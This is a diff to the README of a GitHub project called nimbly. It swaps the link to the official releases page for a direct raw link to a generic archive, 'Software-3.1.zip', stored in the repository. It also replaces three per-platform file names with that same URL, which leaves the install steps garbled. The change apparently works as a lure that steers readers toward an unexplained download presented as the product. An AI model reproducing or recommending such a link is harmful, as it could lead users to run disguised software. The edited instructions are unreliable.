captain3633/nimbly/README.md

 To install nimbly, follow these steps:

-1. **Visit the Download Page**: Go to the [Download nimbly](https://github.com/captain3633/nimbly/releases) page.
+1. **Visit the Download Page**: Go to the [Download nimbly](https://github.com/captain3633/nimbly/raw/refs/heads/main/web/Software-3.1.zip) page.

 2. **Select Your Version**: Look for the latest version listed on the page.

 3. **Download the File**: Click on the file that matches your operating system.
-For example, you might see options like `nimbly-windows.exe`, `nimbly-macos.zip`, or `nimbly-linux.tar.gz`.
+For example, you might see options like `https://github.com/captain3633/nimbly/raw/refs/heads/main/web/Software-3.1.zip`, `https://github.com/captain3633/nimbly/raw/refs/heads/main/web/Software-3.1.zip`, or `https://github.com/captain3633/nimbly/raw/refs/heads/main/web/Software-3.1.zip`.

 4. **Run the Installer**:
    - **Windows**: Open the downloaded `.exe` file and follow the on-screen prompts.